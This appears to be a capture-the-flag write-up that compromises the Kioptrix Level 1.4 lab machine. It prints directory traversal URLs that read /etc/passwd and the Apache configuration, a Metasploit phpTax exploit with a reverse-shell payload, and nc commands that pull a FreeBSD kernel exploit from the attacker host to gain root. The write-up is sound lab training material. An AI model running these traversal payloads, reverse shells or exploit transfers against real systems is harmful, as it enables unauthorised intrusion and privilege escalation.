VulnHub Writeup : Kioptrix Levle 1.4 (#5)
Box Stats :
| Box Information | Details |
| Box Name | Kioptrix Level 1.4 |
| Series | Kioptrix |
| Release Date | 6 Apr 2014 |
| Author | Kioptrix |
| Difficulty | Easy |
| Download Link | Link |
Network Scan
The IP of target vm is 192.168.1.159, Perform nmap scan on targat
$ nmap -sV --top-ports 1000 192.168.1.159 -oN nmap.txt
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-26 16:38 EDT
Nmap scan report for 192.168.1.159
Host is up (0.00050s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.54 secondsAs we can see port 80 and 8080 are open. Checking port 80 web server, it only had It works! message, but in page source there is commented part which points to pchart link
Now open http://192.168.1.159/pchart2.1.3/index.php there is an pchart application hosted on port 80
Now google search shows that pChart 2.1.3 has XSS and Directory traversal vulnerability, where directory traversal vulnerability can be exploited by accessing below link
http://192.168.1.159/pchart2.1.3/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
at this point can not do much with this vulnerability, now lets check port 8080.
It says access forbidden. But we can access the apache server httpd.conf file because of directory traversal vulnerability. And we also know that the os is FreeBsd then the location of httpd.conf file would be /usr/local/etc/apache2x/httpd.conf, now lets try to access it.
http://192.168.1.159/pchart2.1.3/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache2x/httpd.conf
The above picture shows the last lines of httpd.conf file which indicates that the browser user agent has been checked by the web server and if user agent is Mozilla/4.0 then only it can access the application running on port 8080.
So we have to change the browser user agent to mozilla/4.0, and for that we are going to install User agent switcher plugin into firefox browser and then try to access the service running on port 8080
Add Mozilla/4.0 (compatible; Intel Mac OS X 10.6; rv:2.0b8) Gecko/20100101 Firefox/4.0b8) to Kioptrix5
Now enable the custom user agent then access http://192.168.1.159:8080
Open http://192.168.1.159:8080
the phptax app is hosted on http://192.168.1.159:8080/phptax/, a google search on phptax has Remote code execution vulnerability, and there also a metasploit module available to for phptax rce vulnerability, so we are going to use metasploit.
msf6 > use exploit/multi/http/phptax_exec
msf6 exploit(multi/http/phptax_exec) > set RHOSTS 192.168.1.159
RHOSTS => 192.168.1.159
msf6 exploit(multi/http/phptax_exec) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/phptax_exec) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf6 exploit(multi/http/phptax_exec) > set lhost 192.168.1.6
lhost => 192.168.1.6
msf6 exploit(multi/http/phptax_exec) > exploit
[*] Started reverse TCP double handler on 192.168.1.6:4444
[*] 192.168.1.1598080 - Sending request...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo y6th2VULrYqot44x;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Command: echo jVPGdJKnv4d3Y4jP;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "Connected: not found\r\nEscape: not found\r\njVPGdJKnv4d3Y4jP\r\n"
[*] Reading from socket B
[*] B: "y6th2VULrYqot44x\r\n"
[*] Matching...
[*] A is input...
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.1.6:4444 -> 192.168.1.159:25038) at 2021-10-27 16:06:00 -0400
[*] Command shell session 2 opened (192.168.1.6:4444 -> 192.168.1.159:35833) at 2021-10-27 16:06:00 -0400
whoami
www
id
uid=80(www) gid=80(www) groups=80(www)
uname -a
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64Now for privilege escalation, there is a kernel exploit available for FreeBSD 9.0 at exploitdb. Now first download the exploit into attacker machine, then we have to upload/send the exploit code into target machine and compile it and run it on target.
We are going to use nc to send the exploit into target machine
wget https://www.exploit-db.com/download/26368 -O exploit.c
nc -lvvp 8888 < exploit.c the nc listener is listening on port 8888. To download it into target machine, just connect to the attacker machine by
nc 192.168.1.6 8888 > exploit.cIt may takes few seconds to download, then compile and run the exploit
gcc exploit.c -o exploit
exploit.c:89:2: warning: no newline at end of file
./exploit
id
uid=0(root) gid=0(wheel) egid=80(www) groups=80(www)
whoami
rootAnd as we can see we have root access to the machine..
